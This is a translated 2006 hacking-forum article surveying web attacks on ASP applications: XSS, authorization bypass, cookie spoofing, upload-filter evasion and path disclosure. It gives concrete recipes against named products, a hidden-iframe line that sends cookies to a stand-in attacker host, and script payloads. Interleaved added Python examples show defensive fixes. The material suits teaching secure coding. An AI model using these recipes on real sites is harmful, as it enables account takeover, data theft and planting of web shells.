Non-SI exploits against website programs (vulnerability warning) - Black Bar Safety Net
Author: Anonymous (佚名) | Source: www.myhack58.com (MYHACK58:6220067489)
Published: Feb 28, 2006

Part I: Preface
The most popular way to attack websites today is SQL injection (SI). Although SI is easy to use and easily yields high privileges, it has drawn so much attention that any programmer with a little security awareness now guards against it, and because data submitted by GET is recorded in the server logs, administrators can easily find the intruder.
Non-SI attacks, by comparison, usually do not give you permission to operate the server, but for intrusions whose purpose is to obtain data they are still very useful.
Part II: Methods
Unconventional (non-SI) attacks fall into the following categories:
I. Cross-site scripting attacks (XSS)
Cross-site scripting does not directly damage the web server; its main target is the site's visitors. The intruder generally has one of three goals:
The first is to attack page viewers: for example, adding automatic-download code to the page, or using browser vulnerabilities such as the IE Frame bug to plant a Trojan on the viewer's machine or hijack the browser.
The second is to steal viewers' cookies. The intruder builds a page on their own server that receives and stores information, and inserts into the attacked site's page a hidden iframe with width and height 0 whose address is http://hackerserver.com/get.asp?info=document.cookie; the server-side get.asp receives the info parameter and saves it to a database, so the intruder collects the cookies of everyone who views the page on the attacked site. If what is stolen is an ordinary user's password the harm is limited, but if the intruder uses social engineering to make an administrator, whose password is stored in the cookie after login, open the page, the administrator's password can be stolen and the site taken over.
The third is to use many visitors' requests to repeat a certain operation. A while ago a commercial website complained that a well-known domestic search engine had added a hidden iframe to its search alliance that accessed the business's site, effectively DDoSing it until the server load became too high. Whether that story is true or not, the line of thinking is worth noting. Issue 1 of Hacker X-Files 2004 carried an article titled "Playing with X under the tree" (paragraph 6, page 2) in which the author used cross-site scripting to insert posting code into a page; heavy traffic then made spam posts surge and the server was nearly brought down.
Cross-site attacks look simple: you just add dangerous code to submitted content (messages, comments). Bypassing the program's illegal-character filter, however, is a very complex matter. Common means include changing case, converting to ASCII codes or escape characters, calling a remote .js script file, other ways of deforming and hiding the script, and using Flash's GetURL parameter.
Tips
1. Dealing with form-side checks.
To prevent cross-site scripting, some sites add JavaScript to the form that checks the text box value, pops up a dialog on illegal input and blocks submission. A purely client-side restriction is equivalent to no restriction at all: we can save the page locally, remove the detection JS, change the form's action attribute to point at the website, and submit; if the site does not verify again on the server side, it will be compromised. (The Hebei Province high school information technology examination program had this vulnerability.)
2. About UBB.
UBB code is a method some programs use to restrict HTML while not making submitted content too monotonous: users may use certain specific tags, which the server then converts. If the conversion code is poorly written it is still dangerous. Bypassing UBB is demonstrated further in the examples below.
Let me explain with examples:
Example 1-1: Script insertion with no filtering
This is the "customer feedback" feature of one version of Dynamic Mall, a self-submitting page named fk.asp. The code that stores the data in the database looks like this:

rs.addnew
rs("fksubject")=checkFFSQLStr(trim(request("fksubject")))
rs("fkleixing")=checkFFSQLStr(request("fkleixing"))
rs("fkcontent")=checkFFSQLStr(trim(request("fkcontent"))) 'look, no dangerous-character filtering
rs("fkusername")=checkFFSQLStr(trim(request("fkusername")))
rs("fkemail")=checkFFSQLStr(trim(request("fkemail")))
rs("fktel")=checkFFSQLStr(trim(request("fktel")))
rs("fklaizi")=checkFFSQLStr(trim(request("fklaizi")))
rs("fkdate")=now
rs("fkip")=Request.ServerVariables("remote_addr")
rs.update
rs.close
It is easy to see that before storing the data the program only filters characters that could form SI, and even that filtering is unnecessary here because the parameters never enter a query condition; dangerous characters such as script are not filtered at all, and the message display page lyb.asp does not filter before displaying either. If we submit <script>alert(document.cookie)</script> in a comment, the user's cookie information pops up. (Figure 1)
Example 1-2: Script insertion past a badly written UBB filter
The UBB conversion page ubbcode.asp of a well-known Blog program converts dangerous characters in the following piece:

Str = Replace(Str, "script", "script")
Str = Replace(Str, "SCRIPT", "SCRIPT")
Str = Replace(Str, "Script", "Script")
Str = Replace(Str, "script", "Script")
We can submit a spelling such as sCRipt to get around this restriction; for example, submitting

[ img ]javAScript:window. close()[ /img ](remove the spaces)
closes the window.

II. Unauthorized access (override) attacks
Override vulnerabilities arise when the programmer's check of a page's access rights is imperfect, so an intruder can reach pages meant only for a specific user or for administrators without needing that user's or administrator's password.
This reminds me of the "chat room kicking method" popular long ago, around 2000: the chat program's kick page checked user permissions imperfectly, so anyone could kick anyone.
Override vulnerabilities that give administrator privileges are usually fairly subtle, especially in closed-source programs, where one can mostly only guess from experience. Here is a more general example at user level: a page for modifying user information takes a GET parameter, processes it and displays the related data, e.g. http://targetzone.com/edituser.asp?userid=Daniel modifies user Daniel's information. If the program adds no further verification, we can change the parameter's value to modify any user's information, e.g. submit http://targetzone.com/edituser.asp?userid=Kitty to modify Kitty's.
When writing such a program, the programmer should check the session to determine whether the user is logged in and take the current username from the session; everything else (GET data, cookies and so on) is not to be trusted.
Another kind of override, which we may call "step override", targets processes that need N steps to complete: if step X does not check that step X-1 was completed, the attacker can skip the first X-1 steps. This often appears in password programs: the final page that changes the password simply puts the username to modify in a hidden field, with no associated check, so it can change any user's password.
Tips
1. Use of hidden fields.
Many programmers prefer hidden form fields over the session for passing parameters between steps. For non-sensitive data this saves some server resources, but for sensitive data it is very dangerous: the user does not see the hidden field on the page, but can view the source to find it, save the page locally and modify the hidden value to achieve an override.
Now let us look at a few examples:
Example 2-1: Step vulnerability in password retrieval in one version of Dynamic Mall
This version of Dynamic Mall has many vulnerabilities. Its password retrieval is divided into four pages, getpwd.asp to getpwd4.asp, corresponding to entering the username, answering the password hint question, setting the new password, and updating the new password to the database. Part of getpwd4.asp is written like this:

<%username=request("username") 'taken straight from the request; nothing checks that the earlier steps were completed
passwd=md5(trim(request.form("passwd")))
set rs=Server.CreateObject("Adodb.Recordset")
sql="select * from [user] where username='"&username&"'"
rs.open sql,conn,1,3
If rs.eof Then
%>
<script language="javascript">
alert("this user has not registered yet, please go to the home page and REGISTER now!")
location.href="javascript:history.back()"
</script>
<%
else
rs("userpassword")=passwd
rs.update
end if
rs.close
set rs=nothing
conn.close
set conn=nothing%>...
Notice that the first line does not check whether the data obtained from the request actually came from someone who completed the previous steps.
Suppose for some reason we want to steal user Kitty's password. We can: first register a new user, Daniel, noting the answer to the hint question; then go through password retrieval as far as getpwd3.asp and save that page locally; open it in Notepad, change Daniel to Kitty in the form's action attribute and complete the URL; then open the local page, enter a password and submit. Kitty's password is now whatever was entered on that page.
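An added example, not the Mall's code, of the check getpwd4.asp lacks: each step records its completion in server-side session state, and the final step takes the username from the session and ignores the hidden form field. The user table, the MD5 storage (kept only to match the page's code) and the step layout are constructed assumptions.

```python
import hashlib

# Constructed user store; hint answers in clear and passwords as MD5, as in getpwd4.asp.
USERS = {
    "Daniel": {"hint_answer": "blue", "password_md5": hashlib.md5(b"old-daniel").hexdigest()},
    "Kitty":  {"hint_answer": "red",  "password_md5": hashlib.md5(b"old-kitty").hexdigest()},
}

class ResetFlow:
    """One password-reset process. `session` stands in for ASP Session() and never leaves the server."""

    def __init__(self):
        self.session = {"reset_step": 0, "reset_user": None}

    def _require_step(self, expected):
        # Step X refuses to run unless step X-1 recorded its completion in the session.
        if self.session["reset_step"] != expected:
            raise PermissionError(f"step {expected + 1} reached without completing step {expected}")

    def step1_username(self, form_username):
        self._require_step(0)
        if form_username not in USERS:
            return False
        self.session["reset_user"] = form_username   # the only place the target user is fixed
        self.session["reset_step"] = 1
        return True

    def step2_hint(self, form_answer):
        self._require_step(1)
        user = USERS[self.session["reset_user"]]
        if form_answer != user["hint_answer"]:
            return False
        self.session["reset_step"] = 2
        return True

    def step3_set_password(self, form_username, form_password):
        """`form_username` is the hidden field the article warns about: it is ignored."""
        self._require_step(2)
        target = self.session["reset_user"]
        USERS[target]["password_md5"] = hashlib.md5(form_password.encode()).hexdigest()
        self.session["reset_step"] = 0    # one password change per completed verification
        self.session["reset_user"] = None
        return target

def password_matches(username, password):
    return USERS[username]["password_md5"] == hashlib.md5(password.encode()).hexdigest()

def skip_attempt_blocked():
    """Posting straight to the final step on a fresh session must be refused."""
    try:
        ResetFlow().step3_set_password("Kitty", "anything")
    except PermissionError:
        return True
    return False
```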
Example 2-2: Override vulnerability in Nine Cool Network personal homepage space management system 3.0:
The program checks login status in the include file chkuser.asp:

<%if session("user_userid")="" or session("user_username")="" then 'cause of the vulnerability
Response.write "<script>alert('sorry, you are not logged in or the login went wrong!');top.location.href='index.asp'</script>"
response.End
end if
%>
You can see that this file only checks that the session is not empty; it never checks whether the operation belongs to the currently logged-in user! So the application has many override vulnerabilities. Take the one in modifying user information: after logging in, the interface is divided into top, left and right frames. The top frame mainly holds a few navigation links; shift-click "Modify personal information" so that it opens in a new window, and the address is http://127.0.0.1/edituser.asp?userid=39&username=Daniel. Obviously the username parameter holds the current user's name, so let us try changing it: open http://127.0.0.1/edituser.asp?userid=39&username=Kitty and, bingo, the page shows the information Kitty filled in at registration! Just change it. Here we can change the password hint question and answer, then use the "Forgot password" function to change the user's password. Now the vulnerability in displaying and modifying any user's files: testing shows that the page listing files is http://127.0.0.1/main.asp?userid=39&username=Daniel&path=Daniel; by changing the path value we can view, upload, delete and rename files on the server.
Example 2-3: LB5000 registration statement modification vulnerability
In Leiao's (ray proud) LB5000 the files setregmsg.cgi and setregrules.cgi have override vulnerabilities, so an attacker can directly modify the forum's "registration statement" and "short message welcome information". Submitting the following request modifies the registration statement: http://www.targetzome.com/cgi-bin/setregrules.cgi?action=process&therules=the content to write. We can use this to write in some cross-site code.
III. Cookie spoofing
What are cookies? Cookies are text files stored in the browser directory that record your visits to a particular site, and only the site that created the cookie can read it back; a cookie holds about 255 characters and occupies only 4KB of disk space. While the user browses a site the cookie is kept in client memory; after the browser exits it is written to the user's hard disk. Most of the information stored in cookies is ordinary, such as the keys you pressed and the addresses you visited on a site. Many websites, however, use cookies to store private data such as the registration password, username or credit card number.
Cookie spoofing means modifying, on the client, the cookies the site reads, disguising their values as we wish so that the program mistakenly believes we are an already-logged-in user, and thereby achieving some purpose. It can be said to be another override method.
Again, some programmers underestimate the risk and trust the client too much, storing in cookies sensitive information that belongs in the session; this is what creates the vulnerability, which is relatively hidden.
The general idea of the attack is: obtain a legitimate cookie -> modify it with a tool -> access the restricted page, and the override succeeds.
Suppose we have a legitimate account Daniel on http://targetzone.com and want to log in as user Kitty, but do not have Kitty's password (of course; otherwise why attack). We try cookie spoofing to achieve this:
Log in to targetzone.com as Daniel and choose to save the login information, close the browser, open the machine's cookies with IECookiesView, select the site targetzone.com, change the username value to Kitty, and visit the site again: we find we are now logged in as Kitty.
This attack has a big weakness, however. Regardless of what a site stores in cookies, some sites save both the username and the password in cookies and check them against each other on every visit before deciding whether the login is legitimate. So used alone the vulnerability is not very effective, but combined with other intrusion methods it is more useful: for instance, if we have downloaded a site's database but the passwords are MD5 hashed, we cannot log in without brute-forcing the hash, but if the site stores the username and the MD5 password in cookies we can use them directly. Or, if a site's anti-SI measures are tight and no injection point is found in URLs, one may be found in the cookies. And some sites store the user's permission level in cookies, which can be modified to elevate privileges.
Example 3-1: Spoofing vulnerability in a download program:
Its login-handling code looks like this:

<%If Cookies("down_Isadder")="" then%>
<script language="Vbscript">
msgbox("sorry, you do not have permission to manage users! If you are an administrator, please log in!")
window.close()
</script>
<%Else%>

Really dizzying: it only checks whether the cookie is empty, so we use IECookiesView to set down_Isadder to any value other than empty and we can log in to management.
Example 3-2: L-Blog cookie override upload spoofing vulnerability:
This vulnerability recently wrecked many sites, including many hackers' WebLogs. L-Blog's cookie parsing has a logic flaw that lets any user step over to administrator privileges and upload files.
Part of the file attachment.asp:

IF memStatus="SupAdmin" OR memStatus="Admin" Then
IF Request.QueryString("action")="upload" Then
You can see that the program checks whether memStatus has an administrator value and, if so, allows the upload; it does not check who the logged-in user is. Now look at the cookie validation in command.asp: if memName (the username from the cookie) is empty, it performs no operation at all; if it is not empty, it verifies that the saved username and password are correct and, if not, clears the cookie. This leaves a hole: if the username value (memName) in the cookie is empty but the permission value (memStatus) is not, command.asp never validates the username and password, while the upload page only checks that memStatus is administrator, so the upload is allowed.
We can register an ordinary user, log in and save the cookie, then modify the cookie so that memName is empty and memStatus is SupAdmin or Admin, and then we can upload.
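An added example (not L-Blog's or the download program's code) of handling the cookie so that neither example 3-1 nor 3-2 works: the cookie carries only a username plus an HMAC over it, an empty memName is rejected instead of skipped, and the status is looked up in a server-side table rather than read from the client. SECRET and ACCOUNTS are constructed.

```python
import hashlib
import hmac

# Constructed server-side secret and account table; roles live here, never in the cookie.
SECRET = b"constructed-server-secret-never-sent-to-the-client"
ACCOUNTS = {"Daniel": "User", "admin": "SupAdmin"}

def issue_cookie(username):
    """Cookie holds the username and an HMAC over it; there is no memStatus field to edit."""
    sig = hmac.new(SECRET, username.encode(), hashlib.sha256).hexdigest()
    return f"memName={username}; memSig={sig}"

def parse_cookie(cookie):
    fields = {}
    for part in cookie.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            fields[key] = value
    return fields

def authenticate(cookie):
    """Return the server-side status of the cookie's user, or None if the cookie is invalid."""
    fields = parse_cookie(cookie)
    name, sig = fields.get("memName", ""), fields.get("memSig", "")
    if not name or name not in ACCOUNTS:
        return None   # empty memName is a failure, not the 'do nothing' path of command.asp
    expected = hmac.new(SECRET, name.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):
        return None   # memName was edited on the client: signature no longer matches
    return ACCOUNTS[name]   # any memStatus the client sent is simply ignored

def may_upload(cookie):
    """The attachment.asp decision, made from the server-side status only."""
    return authenticate(cookie) in ("SupAdmin", "Admin")
```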
But only certain file types may be uploaded, so we cannot upload an ASP Trojan. What then? Next let us see how an ASP Trojan gets uploaded.
IV. Illegal upload vulnerabilities
Turning legal into illegal: first, two simple cases that exploit no vulnerability.
Some programs forbid uploads with extensions such as asp and asa, but looking at the IIS settings we find other extensions that are also handled by asp.dll, such as cer. So if a program does not allow asp files to be uploaded, we can rename the Trojan to the cer extension and upload it; if the server has not removed the cer mapping, we can run the Trojan. Some extensions can execute SSI (Server Side Include) directives, such as stm: upload a seeit.stm whose content is <!--#include file="conn.asp"-->, then access the file to see the contents of conn.asp. So when programmers write the upload check they should specify what members are allowed to upload, not what kind of file cannot be uploaded.
On upload program vulnerabilities.
A while ago the Dongwang (dynamic network) Forum upload vulnerability caused quite a stir; Daniel also used it to attack many stubborn "chickens" (compromised hosts). Let us first analyze Dongwang's upload:
Dongwang does not allow asp and other dangerous files to be uploaded, but its upload processing has a vulnerability that makes the program obtain its parameters incorrectly, so an intruder can upload any file.
First look at the upload submission page reg_upload.asp:

<form name="form" method="post" action="upfile.asp" enctype="multipart/form-data">
<input type="hidden" name="filepath" value="uploadFace">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="Submit" value="upload" onclick="fname.value=file1.value,parent.document.forms[0].Submit.disabled=true,
parent.document.forms[0].Submit2.disabled=true;">
</form>
The program takes the values of the file1 field and the fname field to make its judgment, so an asp file uploaded directly from the page is detected. We can however construct our own packet and submit it with NC to get past the check. The main problem remains that the uploaded file must end up saved in asp format: file1's value may be legitimate, but how do we reach a saved extension of asp?
A line of Dongwang's component-free upload class reads:

filename=formPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
The program generates the saved file name from this. When the computer examines the string, the key is whether it meets a terminator character; if it does, the string ends there. In other words, when constructing the save path of the uploaded file we only have to trick the computer into thinking that the path parameter has already ended after something like "uploadfaceDaniel.asp", and we achieve our goal.
That is the principle of this exploit. Many upload programs today have this vulnerability; capturing and manually resubmitting is too tiring, so Daniel recommends using one of the upload-vulnerability tools available online to lighten the load.
Now a My Power 3.51 vulnerability. Part of its upload page Upfile_Soft.asp is this:

For i=0 to ubound(arrUpFileType)
If fileEXT=trim(arrUpFileType(i)) then
Enableupload=true 'set once; nothing resets it before the next file is examined
End If
Next
Because the upload class used by My Power can upload several files, we can see from the code above that if several files are uploaded and the first N-1 have illegal extensions while the N-th has a legitimate one, the check passes. So we only have to construct our own page that uploads two files, the second with an extension the program allows. But My Power forbids external form submission; how do we bypass that? See the "forms: attack and defense" section.
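An added example, not the Dongwang or My Power code, of the allow-list upload check this section calls for: each file is vetted on its own (no flag carried across the loop, unlike Upfile_Soft.asp), names containing a terminator or any path character are refused, extensions such as cer and stm fail because they are simply not listed, and the saved name is generated on the server. The extension set is a constructed assumption.

```python
import re
import secrets

# Constructed allow-list: only what members may upload is named, never what they may not.
ALLOWED_EXT = {"jpg", "gif", "png", "zip"}
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")

def extension_of(filename):
    """Extension after the LAST dot, lower-cased."""
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""

def vet_filename(filename):
    """Allow-list check for one client-supplied file name."""
    if "\x00" in filename:                   # a terminator would cut the save path short
        return False
    if _SAFE_NAME.match(filename) is None:   # also blocks '/', '\\', spaces and control chars
        return False
    return extension_of(filename) in ALLOWED_EXT   # asp, asa, cer, stm ... are not listed

def vulnerable_batch_check(filenames):
    """Mirrors the Upfile_Soft.asp loop: the flag is set once and never reset per file."""
    enable_upload = False
    for name in filenames:
        for ext in ALLOWED_EXT:
            if extension_of(name) == ext:
                enable_upload = True
    return enable_upload

def safe_batch_check(filenames):
    """Every file in the batch must pass on its own."""
    return bool(filenames) and all(vet_filename(n) for n in filenames)

def server_side_name(filename):
    """Never reuse the client's name: random stem plus the vetted extension."""
    if not vet_filename(filename):
        raise ValueError("upload name rejected")
    return secrets.token_hex(8) + "." + extension_of(filename)
```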
Small tricks:
1. Using database backup and restore to turn legal into illegal.
After all, many systems have no logical upload vulnerability, so how do we upload a script Trojan? This trick requires that you can log in to the backend and that the system has database backup and restore functions. First upload the Trojan through legitimate channels, renamed to an allowed extension; then, on the backup and restore page, write the uploaded file's name into the backup and restore paths and restore. Since the application stores its database with an asp extension, the Trojan is parsed normally.
V. Forms: attack and defense
Earlier this article touched on form insecurity in several places; let us now summarize. The main idea of a form attack is to save the page containing the form locally, modify it to remove the relevant restrictions, complete its action attribute with the website's address, and submit.
It is not hard to see that everything in a form is dangerous and untrustworthy if the server does not verify it. Programmers are advised to do the legality check on the client, verify again on the server side, and add server-side code that prohibits external submission:

<%server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
if mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#EEEEEE width=450>"
response.write "<tr><td style='font:9pt Verdana'>"
response.write "your path is wrong; data submitted from outside the site is banned, please do not tamper with this parameter!"
response.write "</td></tr></table></center>"
response.end
end if%>
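The check above compares len(SERVER_NAME) characters of the Referer starting at character 8. As an added example (not the article's code), it is ported to Python beside a version that parses the URL and requires the whole host to match: the prefix test accepts any host that merely begins with the server name and rejects an https Referer. The server name and sample Referer values are constructed; as the article notes further down, the Referer is still client-supplied, so either check only deters casual external submission.

```python
from urllib.parse import urlsplit

# Constructed stand-in for Request.ServerVariables("SERVER_NAME")
SERVER_NAME = "targetzone.com"

def prefix_check(referer, server_name=SERVER_NAME):
    """Port of the article's test: mid(HTTP_REFERER, 8, len(SERVER_NAME)) = SERVER_NAME."""
    return referer[7:7 + len(server_name)] == server_name

def strict_check(referer, server_name=SERVER_NAME):
    """Parse the Referer and require the whole host to match, over http or https."""
    if not referer:
        return False            # missing header: treat as external
    parts = urlsplit(referer)
    if parts.scheme not in ("http", "https"):
        return False
    return parts.hostname == server_name.lower()
```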

Forms can restrict us in these ways: JS validity checks, hidden fields, and read-only (ReadOnly) fields.
Remember the Ofstar forum's forum groups, which used a readonly field to display the group's members: we can download the page, remove the readonly attribute, add the members we want to join the group, and submit...
Small tricks:
1. Bypassing the ban on external submission:
You can write your own socket program to modify the http_referer value, but that is rather troublesome; here is a simpler way.
This trick requires image-upload permission. When IE opens a picture whose content is HTML code, it runs that code just like a web page. So we change the extension of our constructed page to an image extension, upload it, open it and submit: the submission now comes from the server side. (Note: the constructed page must have the basic tags such as <html> written out in full.)

Example 5-1: Nine Cool Network personal homepage space management system 3.0 upload-to-any-directory vulnerability:
After logging in, click the "Upload File" button; a page pops up in which the number of uploads can be set, and there is an "Upload Directory" text box that cannot be modified. Save this page in IE, then find line 44 of the file, which reads <LI>upload: <INPUT class=INPUT style="WIDTH: 200px" ReadOnly...; delete ReadOnly, then find line 37 and complete the form tag's action attribute (prefix the website address). Open the page locally: the "upload" text box can now be edited. Change it to ../, select a file to upload, and the file lands in the parent directory.

VI. Database path disclosure and file content disclosure vulnerabilities
Everyone has heard of the %5c database path disclosure vulnerability: in the address of a page that operates the database, replace the "/" nearest the filename with "%5c". If the following conditions are met, the database path is revealed: the error page returned is normally IE's local one, so turn off the local error page (Tools -> Internet Options -> Advanced -> "Show friendly HTTP error messages"); the database must be Access; the page must be in a second-level directory (it does not work in the root); and the page must have no error-handling statements. The principle is rather complex; please Google it.
Some programmers like to give include files the extension inc, and many tutorials recommend it, but this leaves a big hole: inc is not handled by asp.dll by default, so the file is displayed as plain text. If someone can access your database definition page (such as conn.inc) directly, they learn the database's address or the SQL account and password.
To prevent hotlinking of downloads, some sites read the software through a page and stream it to the client, with the file name usually appended as a GET parameter, e.g. http://targetzone.com/down.asp?path=Daniel.zip. We can roughly guess the location of the database file relative to the software library and change the path parameter; with luck we can download the database file without asp.dll parsing it.
Part III: Summary and postscript
It is early morning and the sun is up, bathing the earth; this article, written over about three days of spare time, is basically finished. I would like to emphasize that non-SI vulnerabilities in web applications go far beyond these, and many unknown logic vulnerabilities remain undiscovered. Because of space and time, only some of the more common methods were briefly introduced; I hope Daniel can serve to start the discussion. If you seriously study the code of the programs available online, you can find many vulnerabilities nobody else has found.
Vulnerabilities are not frightening; what is frightening is programmers who are not rigorous and lack a complete, comprehensive way of thinking.
Chief Potato once asked me how I thought of this topic. In fact I was just a rookie who only knew how to inject sites at random with NBSI, and I feel deep regret and concern about my own behaviour. Hackers who only use tools are not hackers; we must learn to use our own minds to discover vulnerabilities and patch them in order to truly improve our art!